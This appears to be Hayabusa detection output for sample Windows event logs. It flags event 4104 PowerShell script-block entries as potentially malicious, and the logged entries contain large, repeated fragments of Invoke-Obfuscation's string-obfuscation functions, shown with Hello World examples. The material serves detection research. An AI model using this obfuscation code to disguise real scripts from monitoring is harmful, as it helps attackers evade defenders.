'+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since 